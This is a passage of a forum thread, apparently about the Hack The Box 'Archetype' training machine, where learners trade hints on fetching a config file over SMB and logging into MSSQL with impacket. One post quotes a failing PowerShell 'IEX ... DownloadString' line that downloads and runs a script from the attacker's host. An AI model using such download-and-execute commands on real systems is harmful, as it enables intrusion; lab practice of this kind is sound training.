Stuck on starting point

Kinda embarrassed but im stuck on the starting point, the step right after using smbclient. After using get prod.dtsConfig im not sure on what to do, any help or hints would be appreciated. Thanks in advance.

kindly check prod.dtsconfig folder in downloads

i am stuck here mssqlclient.py ARCHETYPE\Guest@10.10.10.27 -windows-auth
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed for user ‘ARCHETYPE\Guest’

Type your comment> @q8cloud said:

i am stuck here mssqlclient.py ARCHETYPE\Guest@10.10.10.27 -windows-auth
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed for user ‘ARCHETYPE\Guest’

You’ll want to make sure your slash is going the right way. Also, you’re not logging in as Guest, right? You have a different username to try. Take a look at that.

@bladeplay said:
Kinda embarrassed but im stuck on the starting point, the step right after using smbclient. After using get prod.dtsConfig im not sure on what to do, any help or hints would be appreciated. Thanks in advance.

“get” grabs a copy of that file. Aren’t you curious to see what’s in it?

Hello, I am also stuck and I’m not quiet sure what happens. I used the correct ip and also in the request and this is the result:

output

Exception calling “DownloadString” with “1” argument(s): “Unable to connect to the remote server”

At line:1 char:1

• IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.226/sh

• 
      + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException      

+ FullyQualifiedErrorId : WebException                                         

Until here everything worked perfectly fine